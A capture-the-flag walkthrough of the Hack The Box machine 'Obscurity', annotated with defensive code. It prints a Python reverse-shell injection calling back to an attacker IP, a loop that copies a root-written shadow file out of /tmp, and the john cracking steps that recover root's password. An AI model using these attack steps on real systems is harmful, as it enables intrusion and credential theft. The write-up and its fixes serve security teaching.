
Hack The Box - Obscurity Writeup

First Steps

The first step as with most other boxes is to run nmap on the box.

Nmap

```bash
# -oA writes the results in all three formats to nmap/nmap
nmap -sC -sV -oA nmap/nmap 10.10.10.168
```

Output

```
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA)
|   256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA)
|_  256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519)
80/tcp   closed http
8080/tcp open   http-proxy BadHTTPServer
|_http-server-header: BadHTTPServer
|_http-title: 0bscura
9000/tcp closed cslistener
```

| Port | Service    |
|------|------------|
| 22   | SSH        |
| 80   | HTTP       |
| 8080 | HTTP-proxy |
| 9000 | cslistener |

8080 - HTTP proxy

Since our port 80 is closed the first place to look is port 8080. We find that there is a custom web server application that is still under development.

The webpage has a message to the devs stating that the SuperSecureServer.py script is in the development directory.

Finding SuperSecureServer.py

Using the name of the script we can fuzz for the script on the server using dirbuster.

After a few moments we find the script in the /develop/ directory.

We can now run wget http://10.10.10.168:8080/develop/SuperSecureServer.py to download the web server source code.

Examining the source code we find the exec function passing the URL as a parameter.

```python
exec(info.format(path)) # This is how you do string formatting, right?
```
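The pattern above, shown as an added example that is not SuperSecureServer.py's own code: the request path is formatted into a string and handed to exec, so it reaches Python's parser as code, beside a handler that treats the path purely as data. The template string, function names and the allowlist regex are assumptions; only exec(info.format(path)) is on the page.

```python
import re
from urllib.parse import unquote, urlsplit


def handle_path_unsafe(path: str) -> str:
    """Vulnerable pattern (assumed template): the request path is pasted into
    source text and exec'd, so any quote in the path changes the program
    instead of the data. A path with a quote already fails to even parse."""
    info = "document = '{}'"
    scope = {}
    exec(info.format(path), scope)  # user input becomes code
    return scope["document"]


# Allowlist: slash-separated segments of letters, digits, '.', '_' and '-'.
SAFE_PATH = re.compile(r"^/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]*$")


def handle_path_safe(raw_path: str) -> str:
    """Hardened handler: never evaluate request data. Decode the path, reject
    anything outside the allowlist and any '..' segment, and return it for a
    plain file lookup."""
    path = unquote(urlsplit(raw_path).path)
    if not SAFE_PATH.match(path) or ".." in path.split("/"):
        raise ValueError("rejected request path")
    return path
```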

Python Reverse shell

Using a python reverse shell one-liner, we are able to connect to the box as the www-data user. It can be placed directly in the URL because the exec call takes the request path as its input.

```
10.10.10.168:8080/';s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect
(("10.10.14.16",4455));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash");'
```

Escalating to user

Looking through the directory structure of the box we find that we have access to /home/robert which contains a bunch of files relating to password encryption.

  • SuperSecureCrypt.py
  • passwordreminder.txt
  • out.txt
  • check

Using netcat to transfer these files to our local machine preserves their exact bytes, which copying and pasting the file contents would not.

Examining the source code of SuperSecureCrypt.py we discover it has a decrypt mode, selected by passing the argument -d. The script takes an input file and a key file and creates an output file.

By passing the out.txt file found in the home folder as the input, with the check.txt file as the key, we receive the key that was used to encrypt the password.

```bash
python3 SuperSecureCrypt.py -d -i out.txt -o result.txt -k "$(cat check.txt)"
```

```
################################
#           BEGINNING          #
#    SUPER SECURE ENCRYPTOR    #
################################
  ############################
  #        FILE MODE         #
  ############################
Opening file out.txt...
Decrypting...
Writing to result.txt...
kali@kali:~/Desktop/Obscurity$ cat result.txt
alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichaikali
```
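Why feeding the known plaintext in as the key recovers the real key, shown as an added example that is not SuperSecureCrypt.py's own code. It assumes the script is an additive, Vigenère-style cipher where c[i] = p[i] + k[i mod len(k)] mod MOD (the modulus value is an assumption), which matches the behaviour in the output above: the recovered stream is the key repeated, so its shortest period is the key itself. The sample key and plaintext are constructed.

```python
# Assumed modulus; the cipher shape is what matters for the key recovery below.
MOD = 255


def encrypt(text: str, key: str) -> str:
    """c[i] = (p[i] + k[i mod len(k)]) mod MOD, with the key cycled over the text."""
    return "".join(chr((ord(c) + ord(key[i % len(key)])) % MOD) for i, c in enumerate(text))


def decrypt(text: str, key: str) -> str:
    """Inverse of encrypt: p[i] = (c[i] - k[i mod len(k)]) mod MOD."""
    return "".join(chr((ord(c) - ord(key[i % len(key)])) % MOD) for i, c in enumerate(text))


def recover_key_stream(ciphertext: str, known_plaintext: str) -> str:
    """(p + k) - p = k: with the plaintext in the key slot, decrypt returns the
    key stream. Only positions covered by the known plaintext are meaningful,
    so the result is cut to the overlap."""
    n = min(len(ciphertext), len(known_plaintext))
    return decrypt(ciphertext[:n], known_plaintext[:n])


def shortest_period(s: str) -> str:
    """Collapse a repeating key stream to the actual key (its shortest period)."""
    for n in range(1, len(s) + 1):
        if all(s[i] == s[i % n] for i in range(len(s))):
            return s[:n]
    return s


# Constructed sample: a 13-character key and a plaintext long enough to cycle it.
SAMPLE_KEY = "alexandrovich"
SAMPLE_PLAINTEXT = "constructed check text, long enough to wrap the key several times"
SAMPLE_CIPHERTEXT = encrypt(SAMPLE_PLAINTEXT, SAMPLE_KEY)
```

Because the stream is periodic, any prefix of it that is at least as long as the message to be decrypted works as the key, which is why the long repeated string is accepted in the next step.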

Now that we have our key, we can use it in combination with the passwordreminder.txt file to find the password for robert.

```bash
python3 SuperSecureCrypt.py -d -i passwordreminder.txt -o result.txt -k alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichai
```

```
################################
#           BEGINNING          #
#    SUPER SECURE ENCRYPTOR    #
################################
  ############################
  #        FILE MODE         #
  ############################
Opening file passwordreminder.txt...
Decrypting...
Writing to result.txt...
kali@kali:~/Desktop/Obscurity$ cat result.txt
SecThruObsFTW
```

We now have user credentials:

  • Username robert
  • Password SecThruObsFTW

Logging in with these credentials via SSH gives us access to the user's home folder, with permission to read the user.txt file.

Escalating to root

Running sudo -l we find that we have permission to run sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py as root.

Examining the script we can see that it opens the /etc/shadow file as root and dumps the contents to a file under /tmp, which it then uses to compare credentials for authentication.

Running this program with the credentials for robert, we get the message "Authenticated".

Because the script writes the shadow file into the tmp directory, we can read it as long as we manage to copy the file during the short window before the script removes it.
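The failure mode described above, shown as an added example that is not BetterSSH.py's own code: a secret written to the shared tmp directory is readable by any local user for as long as it exists, and two ways to close that window, either keeping the data in memory or, if a file is unavoidable, using a private 0700 directory with a 0600 file that is removed before returning. The function names are assumptions and the shadow line is constructed (the hash is not real).

```python
import os
import stat
import tempfile

# Constructed sample record, not taken from any real /etc/shadow.
SAMPLE_SHADOW = "root:$6$constructed$notarealhash:18226:0:99999:7:::\n"


def dump_insecure(data: str) -> int:
    """The BetterSSH pattern: a predictable, world-readable file in the shared tmp
    directory. Returns the file's permission bits (umask 022 is forced so the
    demonstration is deterministic); the file is removed before returning."""
    path = os.path.join(tempfile.gettempdir(), "insecure-shadow-copy.txt")
    old = os.umask(0o022)
    try:
        with open(path, "w") as f:  # created 0644: any local user can copy it
            f.write(data)
        return stat.S_IMODE(os.stat(path).st_mode)
    finally:
        os.umask(old)
        os.unlink(path)


def lookup_hash(shadow_text: str, user: str):
    """Preferred fix: parse the shadow data in memory; nothing touches disk."""
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) > 1 and fields[0] == user:
            return fields[1]
    return None


def with_private_tempfile(data: str, consumer):
    """If a file is unavoidable: private 0700 directory, 0600 file created with
    O_EXCL, both removed before returning. Returns (result, file mode, dir mode)."""
    d = tempfile.mkdtemp(prefix="auth-")  # mkdtemp always creates the dir 0700
    fd, path = tempfile.mkstemp(dir=d)    # mkstemp always creates the file 0600
    try:
        with os.fdopen(fd, "w") as f:
            f.write(data)
        fmode = stat.S_IMODE(os.stat(path).st_mode)
        dmode = stat.S_IMODE(os.stat(d).st_mode)
        return consumer(path), fmode, dmode
    finally:
        os.unlink(path)
        os.rmdir(d)


def world_readable(mode: int) -> bool:
    return bool(mode & stat.S_IROTH)
```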

Exploiting BetterSSH.py

To do this we create a script, run alongside the BetterSSH script, that constantly copies everything out of the directory /tmp/SSH.

Firstly we have to create the folder by running mkdir /tmp/SSH

We then create our copy.sh script in our home directory.

copy.sh

```bash
#!/bin/bash
# Loop forever, copying anything that appears in /tmp/SSH before BetterSSH.py removes it.
while true
do
    cp /tmp/SSH/* . 2>/dev/null
done
```

Run this script with ./copy.sh and open a new SSH session in another terminal window as the same user.

Run the sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py script in this new session and login with the credentials for robert.

After we have received the Authenticated message we will find a new file in the home folder. This will be the contents of the copied shadow file.

tmp file

```
root
$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
18226
0
99999
7

robert
$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
18163
0
99999
7
```

If we replace the line breaks with : we will turn the tmp file into a shadow file.

shadow

```
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7
robert:$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/:18163:0:99999:7
```

Copy this to a file named shadow. To crack the shadow file we first need to grab the contents of the passwd file.

Run cat /etc/passwd and copy the contents to a file named passwd.

Unshadow and crack

We now need to combine the two files to turn them into a crackable format for use with john.

Running sudo unshadow passwd shadow > passwords.txt combines the files and creates a passwords.txt file.

We then run john against this file with the rockyou.txt wordlist.

```bash
john passwords.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

We find the password for root is mercedes.

Back in our SSH session, running su - with the password mercedes gives us root access to this box.

Alternative Method

Looking at the permissions of the BetterSSH folder, we find that even though we do not have write permission on the script itself, we do have write permission on the folder.

With this we could rename the BetterSSH.py file to something else and create our own BetterSSH.py file that could escalate straight to a root shell.

This post is licensed under CC BY 4.0 by the author.